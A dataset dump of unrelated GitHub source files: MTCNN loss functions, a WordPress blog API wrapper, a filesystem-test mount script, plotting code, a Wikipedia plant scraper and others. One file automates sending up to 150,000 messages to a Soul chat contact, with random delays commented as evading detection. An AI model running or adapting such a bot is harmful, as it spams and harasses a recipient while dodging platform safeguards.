tf.keras.layers.MaxPool2D(pool_size=2)(x)\n # 4,4,64 -> 3,3,128\n x = tf.keras.layers.Conv2D(128, (2, 2),strides=1,padding='valid',name='conv4')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu4')(x)\n # 3,3,128 -> 128,12,12\n x = tf.keras.layers.Permute((3, 2, 1))(x)\n # 1152 -> 256\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(256, name='conv5')(x)\n x = tf.keras.layers.PReLU(name='prelu5')(x)\n # 鉴别\n # 256 -> 2 256 -> 4 256 -> 10\n classifier = tf.keras.layers.Dense(2,activation='softmax',name='conv6-1')(x)\n bbox_regress = tf.keras.layers.Dense(4, name='conv6-2')(x)\n landmark_regress = tf.keras.layers.Dense(10, name='conv6-3')(x)\n #model = tf.keras.models.Model([input], [classifier, bbox_regress,landmark_regress])\n #my code\n model = tf.keras.models.Model([input], [classifier, bbox_regress,landmark_regress])\n return model\n \n \n \n#人脸分类损失函数\ndef cls_ohem(cls_prob, label):\n \n zeros = tf.zeros_like(label, dtype=tf.float32)\n # 若label中的值小于等于0,则为0,否则为1,就是把label中-1变为0\n label_filter_invalid = tf.where(tf.math.less(label,[0]),zeros,label)\n \n ## 类别size[2*batch]\n num_cls_prob = tf.size(cls_prob)\n \n #把cls_porob变成一维\n cls_prob_reshape = tf.reshape(cls_prob,[num_cls_prob,-1])\n label_int = tf.cast(label_filter_invalid,dtype=tf.int32)\n num_row = tf.cast(cls_prob.get_shape()[0],dtype=tf.int32) #[batch]\n \n # 对应某一batch而言,batch*2为非人类别概率,\n # batch*2+1为人概率类别,indices为对应 cls_prob_reshpae\n # 应该的真实值,后续用交叉熵计算损失\n row = tf.range(num_row)*2 #[0 2 4 6]\n #就是如果label是pos就看1X2中的第2个,neg或part就看第1个\n indices_ = row + label_int\n # 从cls_prob_reshape中获取 索引为indices_的值,squeeze后变成一维的长度为batch_size的张量。\n label_prob = tf.squeeze(tf.gather(cls_prob_reshape, indices_))\n #OHEM向前时,全部的Roi通过网络\n loss = -tf.math.log(label_prob+1e-10)\n zeros = tf.zeros_like(label_prob, dtype=tf.float32)\n ones = tf.ones_like(label_prob, dtype=tf.float32)\n \n # 把标签为±1的样本对应的索引设为1,其余设为0 #这一步是用来计算较大的候选RIO 用来OHEM\n valid_inds = tf.where(label < zeros,zeros,ones)\n #获取有效的样本数(即标签为±1 (正样本和负样本的数量)\n num_valid = tf.reduce_sum(valid_inds)\n \n #num_keep_radio = 0.7 选取70%的数据\n keep_num = tf.cast(num_valid*0.7,dtype=tf.int32)\n # \n \n (\"keep_num\",keep_num)\n \n # 只选取neg,pos的70%损失\n #loss = loss * num_valid\n loss = loss * valid_inds\n \n #OHEM就是对loss从高到底排序\n # 反向时,根据排序选择Batch-size/N 个loss值得最大样本来后向传播model的权重\n loss,_ = tf.math.top_k(loss, k=keep_num)\n \n return tf.math.reduce_mean(loss)\n \n \n# 人脸框损失函数\ndef bbox_ohem(bbox_pred,bbox_target,label):\n \n zeros_index = tf.zeros_like(label,dtype=tf.float32)\n ones_index = tf.ones_like(label,dtype=tf.float32)\n \n # 等于±1的有效为1,不等于1的无效为0,即筛选出pos和part的索引-OHEM策略\n valid_inds = tf.where(tf.math.equal(tf.math.abs(label),1),ones_index,zeros_index)\n \n #计算平方差损失\n \n square_error = tf.math.square(bbox_pred - bbox_target) #16-1-16-14\n square_error = tf.math.reduce_sum(square_error,axis=1) #16*16*4\n \n \n # 保留数据的个数\n num_valid = tf.math.reduce_sum(valid_inds)\n keep_num = tf.cast(num_valid,dtype=tf.int32)\n \n if keep_num == 0:\n return tf.constant(0, dtype=tf.float32)\n \n #OHEM策略,保留部分pos,part的损失\n #square_error = square_error * num_valid\n square_error = square_error * valid_inds\n \n # 选出最大的进行反向传播\n _,k_index = tf.math.top_k(square_error,k=keep_num)\n # 将部分pos样本和part样本的平方和提取出来\n square_error = tf.gather(square_error, k_index)\n \n return tf.math.reduce_mean(square_error)\n \n \n#人脸五官损失函数\ndef landmark_ohem(landmark_pred,landmark_target,label):\n #keep label =-2 then do landmark detection\n\n ones = tf.ones_like(label,dtype=tf.float32)\n zeros = 
tf.zeros_like(label,dtype=tf.float32)\n \n # 只保留landmark数据\n valid_inds = tf.where(tf.equal(label,-2),ones,zeros)\n\n # 计算平方差损失\n square_error = tf.math.square(landmark_pred - landmark_target)\n square_error = tf.math.reduce_sum(square_error,axis=1)\n\n # 保留数据个数\n num_valid = tf.math.reduce_sum(valid_inds) # 0\n keep_num = tf.cast(num_valid, dtype=tf.int32) # 0\n \n if keep_num == 0:\n return tf.constant(0, dtype=tf.float32)\n\n # 保留landmark部分数据损失 \n square_error = square_error * valid_inds\n \n _, k_index = tf.math.top_k(square_error, k=keep_num)\n \n #my code\n square_error = tf.gather(square_error, k_index)\n \n return tf.math.reduce_mean(square_error) # 当square_error为空时会出现nan bug\n \n \n#准确率\ndef cal_accuracy(cls_prob,label):\n \n # 预测最大概率的类别,0代表无人,1代表有人\n pred = tf.argmax(cls_prob,axis=1)\n label_int = tf.cast(label,tf.int64)\n \n #返回pos和neg示例的索引 :按元素返回(x> = y)的真值\n cond = tf.where(tf.greater_equal(label_int,0))\n picked = tf.squeeze(cond)\n #true_label选出picked(pos和neg)坐标\n label_picked = tf.gather(label_int,picked)\n #pre_label选出picked(pos和neg)坐标\n pred_picked = tf.gather(pred,picked)\n \n # accuracy_op = tf.math.reduce_sum(tf.cast(tf.equal(label_picked,pred_picked),dtype=tf.float32))\n # accuracy = tf.math.reduce_mean(tf.cast(tf.math.equal(label_picked, pred_picked), tf.float32))\n return label_picked,pred_picked\n # return accuracy\n","repo_name":"yiiihao/4040_project","sub_path":"mtcnn_model.py","file_name":"mtcnn_model.py","file_ext":"py","file_size_in_byte":9307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30714300117","text":"# Standard library\nimport re\nimport html\nfrom datetime import date\nfrom datetime import datetime\n\n# Packages\nfrom bs4 import BeautifulSoup\nfrom canonicalwebteam import image_template\n\n# Local\nfrom canonicalwebteam.blog import Wordpress\n\n\nclass BlogAPI(Wordpress):\n def __init__(\n self,\n session,\n api_url=\"https://admin.insights.ubuntu.com/wp-json/wp/v2\",\n use_image_template=True,\n thumbnail_width=330,\n thumbnail_height=185,\n ):\n super().__init__(session, api_url)\n\n self.use_image_template = use_image_template\n self.thumbnail_width = thumbnail_width\n self.thumbnail_height = thumbnail_height\n\n def get_articles(\n self,\n tags=None,\n tags_exclude=None,\n exclude=None,\n categories=None,\n sticky=None,\n before=None,\n after=None,\n author=None,\n groups=None,\n per_page=12,\n page=1,\n ):\n articles, metadata = super().get_articles(\n tags,\n tags_exclude,\n exclude,\n categories,\n sticky,\n before,\n after,\n author,\n groups,\n per_page,\n page,\n )\n\n return (\n [self._transform_article(a) for a in articles],\n metadata,\n )\n\n def get_article(self, slug, tags=None, tags_exclude=None):\n article = super().get_article(slug, tags, tags_exclude)\n\n return self._transform_article(article)\n\n def _transform_article(self, article):\n \"\"\"Transform article to include featured image, a group, human readable\n date and a stripped version of the excerpt\n\n :param article: The raw article object\n\n :returns: The transformed article\n \"\"\"\n\n if \"_embedded\" in article:\n article[\"image\"] = article[\"_embedded\"].get(\n \"wp:featuredmedia\", [None]\n )[0]\n article[\"author\"] = article[\"_embedded\"].get(\"author\", [None])[0]\n\n if \"display_category\" not in article:\n categories = article[\"_embedded\"].get(\"wp:term\", [[]])[0]\n\n if categories:\n article[\"display_category\"] = categories[-1]\n\n if (\n \"wp:term\" in article[\"_embedded\"]\n and 
article[\"_embedded\"][\"wp:term\"][3]\n ):\n article[\"group\"] = article[\"_embedded\"][\"wp:term\"][3][0]\n\n if \"date_gmt\" in article:\n article_gmt = article[\"date_gmt\"]\n article_date = datetime.strptime(article_gmt, \"%Y-%m-%dT%H:%M:%S\")\n article[\"date\"] = article_date.strftime(\"%-d %B %Y\")\n\n if \"excerpt\" in article and \"rendered\" in article[\"excerpt\"]:\n article[\"excerpt\"][\"raw\"] = self._strip_excerpt(\n article[\"excerpt\"][\"rendered\"]\n )[:340]\n\n # If the excerpt doesn't end before 340 characters, add ellipsis\n raw_article = article[\"excerpt\"][\"raw\"]\n # split at the last 3 characters\n raw_article_start = raw_article[:-3]\n raw_article_end = raw_article[-3:]\n # for the last 3 characters replace any part of […]\n raw_article_end = raw_article_end.replace(\"[\", \"\")\n raw_article_end = raw_article_end.replace(\"…\", \"\")\n raw_article_end = raw_article_end.replace(\"]\", \"\")\n # join it back up\n article[\"excerpt\"][\"raw\"] = \"\".join(\n [raw_article_start, raw_article_end, \" […]\"]\n )\n\n if (\n article.get(\"_start_month\")\n and article.get(\"_start_year\")\n and article.get(\"_start_day\")\n ):\n start_month_name = self._get_month_name(\n int(article[\"_start_month\"])\n )\n article[\"start_date\"] = \"{} {} {}\".format(\n article[\"_start_day\"], start_month_name, article[\"_start_year\"]\n )\n\n if (\n article.get(\"_end_month\")\n and article.get(\"_end_year\")\n and article.get(\"_end_day\")\n ):\n end_month_name = self._get_month_name(int(article[\"_end_month\"]))\n article[\"end_date\"] = \"{} {} {}\".format(\n article[\"_end_day\"], end_month_name, article[\"_end_year\"]\n )\n if \"content\" in article:\n # replace url on the blog article page\n article[\"content\"][\"rendered\"] = self._replace_url(\n article[\"content\"][\"rendered\"]\n )\n\n if (\n \"image\" in article\n and article[\"image\"] is not None\n and \"source_url\" in article[\"image\"]\n ):\n # replace url from the image thumbnail\n article[\"image\"][\"source_url\"] = self._replace_url(\n article[\"image\"][\"source_url\"]\n )\n\n # create default rendered image\n article[\"image\"][\"rendered\"] = (\n ''\n )\n\n if self.use_image_template:\n if \"content\" in article:\n # apply image template for blog article images\n article[\"content\"][\"rendered\"] = self._apply_image_template(\n content=article[\"content\"][\"rendered\"],\n width=720,\n )\n\n if \"image\" in article:\n # apply image template to thumbnail image\n if (\n article[\"image\"] is not None\n and \"source_url\" in article[\"image\"]\n ):\n article[\"image\"][\"rendered\"] = self._apply_image_template(\n content=article[\"image\"][\"rendered\"],\n width=self.thumbnail_width,\n height=self.thumbnail_height,\n use_e_sharpen=True,\n )\n\n return article\n\n def _replace_url(self, content):\n \"\"\"Change insights url to ubuntu.com\n\n :param content: String to replace url\n\n :returns: A string with converted urls\n \"\"\"\n\n url = \"admin.insights.ubuntu.com/wp-content/uploads\"\n new_url = \"ubuntu.com/wp-content/uploads\"\n\n return content.replace(url, new_url)\n\n def _strip_excerpt(self, raw_html):\n \"\"\"Remove tags from a html string\n\n :param raw_html: The HTML to strip\n\n :returns: The stripped string\n \"\"\"\n clean_regex = re.compile(\"<.*?>\")\n clean_text = re.sub(clean_regex, \"\", raw_html)\n return html.unescape(clean_text).replace(\"\\n\", \"\")\n\n def _get_month_name(self, month_index):\n \"\"\"\n Get the month name from it's number, e.g.:\n January\n \"\"\"\n\n return 
date(1900, month_index, 1).strftime(\"%B\")\n\n def _apply_image_template(\n self, content, width, height=None, use_e_sharpen=False\n ):\n \"\"\"Apply image template to the img tags\n\n :param content: String to replace url\n :param width: Default width of the image\n :param height: Default height of the image\n\n :returns: HTML images templated\n \"\"\"\n\n soup = BeautifulSoup(content, \"html.parser\")\n for image in soup.findAll(\"img\"):\n if not image.get(\"src\") or \"http\" not in image.get(\"src\"):\n continue\n\n img_width = (\n image.get(\"width\")\n if image.get(\"width\") is not None\n and image.get(\"width\").isdigit()\n else None\n )\n\n img_height = (\n image.get(\"height\")\n if image.get(\"height\") is not None\n and image.get(\"height\").isdigit()\n else None\n )\n\n new_image = BeautifulSoup(\n image_template(\n url=image.get(\"src\"),\n alt=\"\",\n width=img_width or width,\n height=img_height or height,\n hi_def=True,\n fill=True,\n e_sharpen=use_e_sharpen,\n loading=\"lazy\",\n ),\n \"html.parser\",\n )\n image.replace_with(new_image)\n\n return str(soup)\n","repo_name":"canonical/canonicalwebteam.blog","sub_path":"canonicalwebteam/blog/blog_api.py","file_name":"blog_api.py","file_ext":"py","file_size_in_byte":8343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30472603552","text":"from selenium import webdriver\r\nimport time\r\nimport random\r\n\r\n# 创建 WebDriver 对象,指明使用chrome浏览器驱动\r\nwd = webdriver.Chrome(executable_path=\"chromedriver.exe\")\r\nwd.get('https://chat.soulapp.cn/')\r\n\r\n# 扫描二维码的时间\r\ntime.sleep(20)\r\n\r\n# 点击第一个联系人\r\nwd.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/div[1]/div/div[3]/div/div[1]').click()\r\n\r\n# 获取输入框\r\nSendBox = wd.find_element_by_xpath('//*[@id=\"input\"]')\r\n\r\n# ��取发送button\r\nSendButton = wd.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/div[2]/div/div/div[3]/div[3]/div')\r\n\r\n# 定义判断数\r\nnumber = 0\r\n\r\n# 循环输入,并发送\r\nfor i in range(0, 150000):\r\n # 消息发送 执行\r\n begin = time.time()\r\n\r\n if number < 8:\r\n SendBox.send_keys(random.choice(['我不能给你全世界,但是,我的全世界全都给你',\r\n '春风十里不如你,愿有岁月可回首,且以深情共白头',\r\n '我曾做过最好的事就是对你一如既往的坚持',\r\n '有的人说不清哪里好,但就是谁都替代不了',\r\n '不是我执着,而是你值得',\r\n '其实你不喜欢我,我也不会死,但是如果你肯喜欢我,我一定会非常非常勇敢地活下去',\r\n '每个人心中都有一团火, 路过的人只能看到烟。 但是总有一个人, 总有那么一个人能看到这火, 然后走过来陪我一起',\r\n '没遇见你之前,我没想过结婚这事,遇见你之后,结婚这事我没想过别人',\r\n '有人问我你究竟哪里好,这么多年我还忘不了,春风再美也比不上你的笑,没见过你的人不会明了',\r\n '我还在努力,你先不要喜欢其他人',\r\n '和你在一起的时刻都很美好,因为天气好,因为天气不好,因为天气刚刚好',\r\n '当有人说到幸福二字时,我满脑子都是我们',\r\n '一想到你,我对整个世界都很温柔',\r\n '我爱你没变,变的是我更爱你了',\r\n '你一声不离,换我余生不弃',\r\n '我想要的很简单,时光还在,你还在',\r\n '你永远也看不到我最寂寞时候的样子,因为只有你不在我身边的时候,我才最寂寞',\r\n '有那么多事情我无能为力,比如生老病死,比如时光流逝,比如我爱你',\r\n '林深时见鹿,海蓝时见鲸,梦醒时见你',\r\n '未经允许,擅自喜欢你,特别不好意思']))\r\n else:\r\n SendBox.send_keys(random.randint(9999, 99999))\r\n SendButton.click()\r\n\r\n # 记录时间\r\n Tic = time.time()\r\n # 设置延迟时间防检测\r\n time.sleep(random.uniform(1, 3))\r\n # 记录时间\r\n Toc = time.time()\r\n # 消息发送 结束\r\n end = time.time()\r\n # 总时间\r\n TIME = end - begin\r\n\r\n if TIME < 10 and number < 8:\r\n number = 0\r\n else:\r\n number += 1\r\n\r\n print(\"成功发送第 %d 条消息,休眠时差%f秒,发送总时间%f秒,超时计数%d次\" % (i + 1, (Toc - Tic), TIME, number))\r\n","repo_name":"Juan-Chen-BNUZ/soul-auto","sub_path":"venv/soul/soulSend.py","file_name":"soulSend.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34671233702","text":"import os, pwd, sys, optparse, socket, time, o2tf, pdb, 
config\n#\nlogfile = config.LOGFILE\n#\nUsage = 'Usage: %prog [--Debug] \\\n[-l|--label label] \\\n[-m|--mountpoint mountpoint] \\\n[-o|--options mountoptions] \\\n[--mount] \\\n[--umount]'\n#\nif __name__=='__main__':\n\tparser = optparse.OptionParser(Usage)\n#\n\tparser.add_option('--Debug',\n\t\taction=\"store_true\",\n\t\tdest='DEBUGON',\n\t\tdefault=False)\n#\n\tparser.add_option('-l', \n\t\t'--label', \n\t\tdest='label', \n\t\ttype='string', \n\t\thelp='Label of the partition to be mounted.')\n#\n\tparser.add_option('--mount',\n\t\taction=\"store_true\",\n\t\tdest='domount',\n\t\tdefault=False)\n#\n\tparser.add_option('-m', \n\t\t'--mountpoint', \n\t\tdest='mountpoint',\n\t\ttype='string',\n\t\thelp='Directory where the partition will be mount.')\n#\n\tparser.add_option('-o',\n\t\t'--options',\n\t\tdest='mountoptions',\n\t\ttype='string',\n\t\thelp='mounting options to be added')\n#\n\tparser.add_option('--umount',\n\t\taction=\"store_true\",\n\t\tdest='doumount',\n\t\tdefault=False)\n#\n\t(options, args) = parser.parse_args()\n\tif len(args) != 0:\n\t\tparser.error('incorrect number of arguments')\n\tmounted = o2tf.CheckMounted(options.DEBUGON, logfile, \n\t\toptions.mountpoint)\n\tif options.domount:\n\t\tif not options.mountpoint:\n\t\t\tparser.error('Please specify mountpoint.')\n\t\tif not options.label:\n\t\t\tparser.error('Please specify Label.')\n\t\tif options.mountoptions:\n\t\t\tmt_options = '-o %s' %(options.mountoptions)\n\t\telse:\n\t\t\tmt_options = ''\n\t\tif not mounted:\n\t\t\to2tf.SudoMount(options.DEBUGON, logfile, \n\t\t\t\t options.mountpoint, options.label,\n\t\t\t\t mt_options)\n\t\telse:\n\t\t\to2tf.printlog('Partition already mounted.',\n\t\t\t\tlogfile, 0, '')\n\t\t\tsys.exit(1)\n\n\tif options.doumount:\n\t\tif not options.mountpoint:\n\t\t\tparser.error('Please specify mountpoint.')\n\t\tif mounted:\n\t\t\to2tf.SudoUmount(options.DEBUGON, logfile, \n\t\t\t\toptions.mountpoint)\n\t\telse:\n\t\t\to2tf.printlog('Partition not mounted.',\n\t\t\t\tlogfile, 0, '')\n\t\t\tsys.exit(1)\n#\n","repo_name":"markfasheh/ocfs2-test","sub_path":"programs/python_common/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"17465036066","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skued import baseline_dt, gaussian\n\nfrom dissutils import MEDIUM_FIGURE_WIDTH, discrete_colors, tag_axis\n\ns, intensity = np.load(Path(\"data\") / \"appendix\" / \"rutile_vo2.npy\")\nq = 4 * np.pi * s\n\n# Double exponential inelastic background and substrate effects\ndiffuse = 75 * np.exp(-7 * s) + 55 * np.exp(-2 * s)\nsubstrate1 = 0.8 * gaussian(s, center=s.mean(), fwhm=s.mean() / 4)\nsubstrate2 = 0.9 * gaussian(s, center=s.mean() / 2.5, fwhm=s.mean() / 4)\n\nsignal = intensity + diffuse + substrate1 + substrate2\n\nfig, (ax1, ax2) = plt.subplots(\n nrows=2,\n ncols=1,\n sharex=True,\n figsize=(MEDIUM_FIGURE_WIDTH, MEDIUM_FIGURE_WIDTH),\n)\n\nbest_baseline = baseline_dt(signal, level=7, max_iter=150, wavelet=\"qshift3\")\nfor trace, color, label in zip(\n [signal, signal - intensity, best_baseline],\n discrete_colors(3),\n [\"signal\", \"background\", \"baseline\"],\n):\n ax1.plot(q, trace, \"-\", color=color, label=label)\n\nax1.set_ylim([28, 73])\nax1.legend(edgecolor=\"none\", ncol=3, loc=\"center\", bbox_to_anchor=(0.5, 1.1))\n\nc1, c2 = discrete_colors(2)\nax2.plot(q, intensity, \"-\", color=c1, 
label=\"True intensity\")\nax2.plot(\n q,\n signal - baseline_dt(signal, level=7, max_iter=150, wavelet=\"qshift3\"),\n color=c2,\n label=\"Background-subtracted\",\n)\nax2.set_xlabel(\"$|\\mathbf{q}|$ ($\\AA^{-1}$)\")\nax2.set_xlim([0.2 * 4 * np.pi, 0.4 * 4 * np.pi])\nax2.legend(\n edgecolor=\"none\", ncol=2, loc=\"center\", bbox_to_anchor=(0.5, 1.1), framealpha=0\n)\n\nfor ax, label in zip([ax1, ax2], [\"a)\", \"b)\"]):\n ax.set_ylabel(\"Intensity [a.u.]\")\n tag_axis(ax, label, x=0.96, horizontalalignment=\"right\", y=0.9)\n\nplt.tight_layout()\n","repo_name":"LaurentRDC/dissertation","sub_path":"figures/appendix/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"37739926439","text":"'''\n2020-07-06\n[from dailycodingproblem.com #27]\n\nGiven a string of round, curly, and square open and closing brackets, return \nwhether the brackets are balanced (well-formed).\n\nFor example, given the string \"([])[]({})\", you should return true.\nGiven the string \"([)]\" or \"((()\", you should return false.\n'''\n\ndef balanced(string):\n # start with placeholder to avoid index error / clumsy empty list checking\n ledger = [' '] \n\n for s in string:\n last_open_bracket = ledger[-1]\n \n if s not in '({[]})':\n pass\n if s in '({[':\n if last_open_bracket not in ' ({[':\n return False\n ledger.append(s)\n elif s in ')}]':\n if (\n (s == ')' and last_open_bracket == '(') or\n (s == '}' and last_open_bracket == '{') or\n (s == ']' and last_open_bracket == '[')\n ):\n ledger.pop()\n else:\n return False\n \n if ledger[-1] != ' ':\n return False\n return True\n\n\n'''\n# TESTS (must all return True)\n\n# Base cases from question\nbalanced(\"([])[]({})\") == True\nbalanced(\"([)]\") == False\nbalanced(\"((()\") == False\n\nbalanced(\"((((((((((asdf))))))))))\") == True\nbalanced(\"((((((((((asdf)))))))))))))\") == False\n\n# No brackets should still return True\nbalanced(\"asdf\") == True \n\n# Starting with a closing bracket should return False\nbalanced(\"]asdf[\") == False\nbalanced(\"))asdf((\") == False\nbalanced(\"}}}asdf\") == False\n'''\n","repo_name":"ermanh/dailycoding","sub_path":"20200706_balanced_brackets.py","file_name":"20200706_balanced_brackets.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34409033875","text":"# coding: utf-8 \nfrom bs4 import BeautifulSoup as bs\nfrom urllib.request import urlopen\nimport wikipedia\nimport utils\nimport sys\nimport json\n\nclass WikipediaQueryEngine:\n '''\n This query and scraping class is only relevant for the html structure of wikipedia\n pages around 2016.\n '''\n scraped_pages_by_url = {}\n results_by_tuple = {}\n\n def __init__(self):\n wikipedia.set_lang(\"fr\")\n\n def build_binominal_name_for_query(self, genus, species):\n infered_binominal_name = genus+' '+species\n infered_binominal_name = infered_binominal_name.replace(' x ', ' ×')\n return infered_binominal_name\n\n def build_species_name_from_binominal_name(self, binominal_name, genus):\n binominal_name_words = binominal_name.split()\n normalized_genus = utils.normalize(genus)\n species_words = []\n for binominal in binominal_name_words:\n normalized_binominal = utils.normalize(binominal)\n if normalized_binominal != normalized_genus:\n species_words.append(normalized_binominal)\n species = \"\"\n for word in species_words:\n species += 
word.lower() + ' '\n return species.strip()\n\n def enrich_data(self, name_french, genus, species):\n \"\"\"\n Returns a dictionary in the form of:\n {\n \"genus\" : \"...\"\n \"species\" : \"...\"\n \"genus_page\" : {\n \"url\" : \"...\"\n \"page_title\" : \"...\"\n \"page_subtitle\" : \"...\"\n \"description\" : \"...\"\n }\n \"species_page\" : {\n \"url\" : \"...\"\n \"page_title\" : \"...\"\n \"page_subtitle\" : \"...\"\n \"description\" : \"...\"\n }\n \"info_french\" : {\n ...\n }\n }\n \"\"\"\n\n if (name_french, genus, species) in WikipediaQueryEngine.results_by_tuple:\n return WikipediaQueryEngine.results_by_tuple[(name_french, genus, species)]\n\n undefined_species = False\n\n # This step is important : when names such as \"Erable indéterminé\" come up,\n # Wikipedia API often gives strange results (\"Erable indéterminé\" ~> \"Violon\")\n words = name_french.split()\n name = \"\"\n for word in words:\n if(utils.normalize(word) == 'indetermine'):\n undefined_species = True\n else:\n name += word+' '\n name = name.strip()\n\n result = { 'genus':'', 'genus_page':{}, 'species':'', 'species_page':{}, 'info_french':{} }\n\n if(undefined_species):\n # We only have to find a genus page\n queries_for_genus = set()\n queries_for_genus.add(genus)\n queries_for_genus.add(name.split()[0])\n queries_for_genus.add(name)\n\n for query_for_genus in queries_for_genus:\n genus_page = self.find_genus_page_for(query_for_genus)\n if genus_page:\n result[\"genus_page\"] = genus_page.copy()\n result[\"genus\"] = genus_page[\"info_french\"][\"Genre\"]\n break\n else:\n # We have to find a genus page AND a species page\n species_page = self.find_species_page_for(name)\n if not species_page :\n # plant name did not return a species page, use binominal name build from genus and species names\n species_page = self.find_species_page_for(self.build_binominal_name_for_query(genus, species))\n if species_page:\n # we finaly found a species page\n result[\"species_page\"] = species_page.copy()\n result[\"species\"] = self.build_species_name_from_binominal_name(species_page[\"info_french\"][\"Nom binominal\"], species_page[\"info_french\"][\"Genre\"])\n\n # And also the corresponding genus page\n genus_page = self.find_genus_page_for(name)\n queries_for_genus = set()\n if species_page:\n queries_for_genus.add(species_page[\"info_french\"][\"Genre\"])\n if name.strip():\n queries_for_genus.add(name.split()[0])\n queries_for_genus.add(genus)\n for query_for_genus in queries_for_genus:\n genus_page = self.find_genus_page_for(query_for_genus)\n if genus_page:\n result[\"genus_page\"] = genus_page.copy()\n result[\"genus\"] = genus_page[\"info_french\"][\"Genre\"]\n break\n\n max_page_info = {}\n if \"genus_page\" in result and result[\"genus_page\"]:\n max_page_info = result[\"genus_page\"][\"info_french\"].copy()\n del result[\"genus_page\"][\"info_french\"]\n\n species_page_info = {}\n if \"species_page\" in result and result[\"species_page\"]:\n species_page_info = result[\"species_page\"][\"info_french\"].copy()\n del result[\"species_page\"][\"info_french\"]\n\n max_page_info.update(species_page_info)\n\n if max_page_info:\n result[\"info_french\"] = max_page_info\n\n WikipediaQueryEngine.results_by_tuple[(name_french, genus, species)] = result.copy()\n\n return result\n\n def find_genus_page_for(self, query):\n return self.find_page_for(query, species=False)\n\n def find_species_page_for(self, query):\n return self.find_page_for(query, species=True)\n\n def find_page_for(self, query, species=True):\n \"\"\"\n 
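Searches Wikipedia for the given query and scrapes the top hit, keeping the page only when its taxobox identifies a Plantae genus or species.\n\n        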
Returns a dictionary in the form of:\n {\n \"url\" : \"...\"\n \"page_title\" : \"...\"\n \"page_subtitle\" : \"...\"\n \"description\" : \"...\"\n \"info_french\" : \"...\"\n }\n \"\"\"\n results = {}\n\n # query wikipedia API\n try:\n page = wikipedia.page(wikipedia.search(query)[0])\n url = page.url\n\n page_results = {}\n\n # scrape given url\n if url in WikipediaQueryEngine.scraped_pages_by_url:\n page_results = WikipediaQueryEngine.scraped_pages_by_url[url]\n else:\n page_results = self.scrape_page(url)\n WikipediaQueryEngine.scraped_pages_by_url[url] = page_results\n\n # check if page is relevant (must refer to a plantae)\n if \"Règne\" not in page_results[\"info_french\"] or utils.normalize(page_results[\"info_french\"][\"Règne\"]) != \"plantae\":\n raise Exception\n\n if species:\n # Check if page is species\n if(\"Nom binominal\" not in page_results[\"info_french\"]):\n # Page is not a species\n raise Exception\n else:\n results[\"info_french\"] = page_results[\"info_french\"].copy()\n results[\"url\"] = page.url\n results[\"page_title\"] = page.title\n if(\"page_subtitle\" in page_results):\n results[\"page_subtitle\"] = page_results[\"page_subtitle\"]\n else:\n results[\"page_subtitle\"] = \"\"\n results[\"description\"] = page.summary\n else :\n # Check if page is genus\n if(\"Genre\" not in page_results[\"info_french\"] or \"Nom binominal\" in page_results[\"info_french\"]):\n # Not a genus\n raise Exception\n else:\n results[\"info_french\"] = page_results[\"info_french\"].copy()\n results[\"url\"] = page.url\n results[\"page_title\"] = page.title\n if(\"page_subtitle\" in page_results):\n results[\"page_subtitle\"] = page_results[\"page_subtitle\"]\n else:\n results[\"page_subtitle\"] = \"\"\n results[\"description\"] = page.summary\n except:\n results = {}\n\n return results\n\n def scrape_page(self, url):\n\n results = {}\n\n raw = urlopen(url)\n soup = bs(raw, \"html.parser\")\n info = {}\n try:\n tables = soup.find_all('table',{'class':'taxobox_classification'})\n for table in tables:\n for tr in table.find_all('tr') :\n th = tr.find('th')\n td = tr.find('td')\n info[th.text] = td.text\n center_taxoboxes = soup.find_all('p',{'class':'center taxobox_classification'})\n for center_taxobox in center_taxoboxes:\n center_taxobox_title = center_taxobox.find_previous_sibling('p').get_text()\n\n if(center_taxobox_title == 'Nom binominal' or center_taxobox_title == 'Hybride'):\n binominal = center_taxobox.select('span[lang=\\\"la\\\"]')[0].get_text().replace(\"×\", \"× \")#binominal\n info[\"Nom binominal\"] = binominal\n elif(center_taxobox_title == 'Genre'):\n info[\"Genre\"] = center_taxobox.select('span[lang=\\\"la\\\"]')[0].get_text()\n\n subtitle_spans = soup.select('span#sous_titre_h1')\n if subtitle_spans is not None:\n subtitle = \"\"\n if(len(subtitle_spans)>0):\n subtitle = subtitle_spans[0].text\n for i in range(len(subtitle_spans)-1):\n subtitle += ' / '+subtitle_spans[i+1].text\n if(subtitle.strip()):\n results[\"page_subtitle\"] = subtitle\n results[\"info_french\"] = info\n except:\n results[\"info_french\"] = {}\n\n return results\n\nw = WikipediaQueryEngine()\n\nres = w.enrich_data(\"nyssa sylvatica\", \"nyssa\", \"sylvatica\")\n\nprint(res)\n","repo_name":"Romathonat/PagesVertes","sub_path":"scripts/wikipediaQueryEngine.py","file_name":"wikipediaQueryEngine.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41117746075","text":"# Imports from 3rd party 
libraries\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Imports from this application\nfrom app import app\n\n# 1 column layout\n# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout\ncolumn1 = dbc.Col(\n    [\n        dcc.Markdown(\n            \"\"\"\n        \n            ## Data\n            The data used for this process includes the individual batting statistics for international players per match \n            and the statistics for team match results in International Twenty Twenty Cricket. I took the two datasets and merged them together \n            so that I could use both player stats and team stats to fit into my model. The data was sourced from \n            https://data.world/cclayford/cricinfo-statsguru-data.\n\n            ## Process\n\n            I 